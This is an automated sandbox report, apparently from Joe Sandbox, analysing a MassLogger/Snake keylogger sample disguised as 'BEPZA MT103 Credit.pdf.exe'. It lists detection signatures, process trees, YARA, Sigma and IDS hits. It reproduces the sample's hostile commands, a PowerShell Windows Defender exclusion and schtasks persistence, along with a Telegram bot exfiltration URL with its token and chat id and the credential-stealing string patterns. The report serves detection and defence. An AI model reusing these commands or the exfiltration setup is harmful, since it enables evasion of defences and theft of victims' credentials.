Edit tour

Windows Analysis Report
BEPZA MT103 Credit.pdf.exe

Overview

General Information

Sample name:	BEPZA MT103 Credit.pdf.exe
Analysis ID:	1665813
MD5:	ef4d4ab7e588827c7a17293b53a30d1f
SHA1:	6e2fd3bc90fce07f121e9eb3ad94545f30773ec6
SHA256:	c6de8c6d5228fa7a6101a2cf1574d974f48d8e6caf1c862cc5004d36cf3d527b
Tags:	exeuser-James_inthe_box
Infos:

Detection

MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

BEPZA MT103 Credit.pdf.exe (PID: 8092 cmdline: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)

powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5740 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7828 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BEPZA MT103 Credit.pdf.exe (PID: 4012 cmdline: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)

YEGIgzyAhkvT.exe (PID: 7996 cmdline: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe MD5: EF4D4AB7E588827C7A17293B53A30D1F)

schtasks.exe (PID: 7836 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

YEGIgzyAhkvT.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)

YEGIgzyAhkvT.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7288f:$a1: get_encryptedPassword 0x896af:$a1: get_encryptedPassword 0xa02cf:$a1: get_encryptedPassword 0x72bb7:$a2: get_encryptedUsername 0x899d7:$a2: get_encryptedUsername 0xa05f7:$a2: get_encryptedUsername 0x7262a:$a3: get_timePasswordChanged 0x8944a:$a3: get_timePasswordChanged 0xa006a:$a3: get_timePasswordChanged 0x7274b:$a4: get_passwordField 0x8956b:$a4: get_passwordField 0xa018b:$a4: get_passwordField 0x728a5:$a5: set_encryptedPassword 0x896c5:$a5: set_encryptedPassword 0xa02e5:$a5: set_encryptedPassword 0x74201:$a7: get_logins 0x8b021:$a7: get_logins 0xa1c41:$a7: get_logins 0x73eb2:$a8: GetOutlookPasswords 0x8acd2:$a8: GetOutlookPasswords 0xa18f2:$a8: GetOutlookPasswords
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f425:$a1: get_encryptedPassword 0x5f73e:$a2: get_encryptedUsername 0x5f1d4:$a3: get_timePasswordChanged 0x5f2f5:$a4: get_passwordField 0x5f43b:$a5: set_encryptedPassword 0x60d3e:$a7: get_logins 0x609ef:$a8: GetOutlookPasswords 0x607e1:$a9: StartKeylogger 0x60c8e:$a10: KeyLoggerEventArgs 0x6083e:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cc22:$a1: get_encryptedPassword 0x1c9d1:$a3: get_timePasswordChanged 0x1caf2:$a4: get_passwordField 0x1cc38:$a5: set_encryptedPassword 0x19a21:$a7: get_logins 0x196d2:$a8: GetOutlookPasswords 0x194c4:$a9: StartKeylogger 0x19971:$a10: KeyLoggerEventArgs 0x19521:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: YEGIgzyAhkvT.exe PID: 7996	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: YEGIgzyAhkvT.exe PID: 8120	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: YEGIgzyAhkvT.exe PID: 8120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YEGIgzyAhkvT.exe PID: 8120	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: YEGIgzyAhkvT.exe PID: 8120	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data 0x12967:$a5: \Kometa\User Data\Default\Login Data
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data 0x12967:$a5: \Kometa\User Data\Default\Login Data
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25dd7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x260ff:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25b72:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25c93:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ded:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27749:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x273fa:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x271ec:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x27699:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler 0x27249:$a11: KeyLoggerEventArgsEventHandler
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fd7:$a1: get_encryptedPassword 0x3cbf7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x262ff:$a2: get_encryptedUsername 0x3cf1f:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d72:$a3: get_timePasswordChanged 0x3c992:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25e93:$a4: get_passwordField 0x3cab3:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25fed:$a5: set_encryptedPassword 0x3cc0d:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27949:$a7: get_logins 0x3e569:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x275fa:$a8: GetOutlookPasswords 0x3e21a:$a8: GetOutlookPasswords
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", CommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", CommandLine|base64offset|contains: 1=t, Image: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, NewProcessName: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, OriginalFileName: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ProcessId: 8092, ProcessName: BEPZA MT103 Credit.pdf.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", ProcessId: 7804, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe, ParentImage: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe, ParentProcessId: 7996, ParentProcessName: YEGIgzyAhkvT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", ProcessId: 7836, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", ProcessId: 7828, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", ProcessId: 7804, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", ProcessId: 7828, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T21:30:30.734705+0200	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49698	149.154.167.220	443	TCP
2025-04-15T21:30:30.779130+0200	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49699	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T21:30:22.067131+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49689	132.226.247.73	80	TCP
2025-04-15T21:30:22.223361+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	132.226.247.73	80	TCP
2025-04-15T21:30:29.707778+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49689	132.226.247.73	80	TCP
2025-04-15T21:30:29.817129+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T21:30:30.264471+0200	1810008	1	Potentially Bad Traffic	192.168.2.5	49699	149.154.167.220	443	TCP
2025-04-15T21:30:30.276455+0200	1810008	1	Potentially Bad Traffic	192.168.2.5	49698	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BEPZA MT103 Credit.pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe

Avira: detection malicious, Label: HEUR/AGEN.1307338

Found malware configuration

Source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}
Source: YEGIgzyAhkvT.exe.8120.16.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe

ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: BEPZA MT103 Credit.pdf.exe	Virustotal: Detection: 66%			Perma Link
Source: BEPZA MT103 Credit.pdf.exe	ReversingLabs: Detection: 75%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.8%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 4x nop then jmp 02B99731h	10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 4x nop then jmp 02B99E5Ah	10_2_02B99A30
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 4x nop then jmp 02B99E5Ah	10_2_02B99D87
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 4x nop then jmp 01269731h	16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 4x nop then jmp 01269E5Ah	16_2_01269A40
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 4x nop then jmp 01269E5Ah	16_2_01269A30
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 4x nop then jmp 01269E5Ah	16_2_01269D87

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49699 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49698 -> 149.154.167.220:443
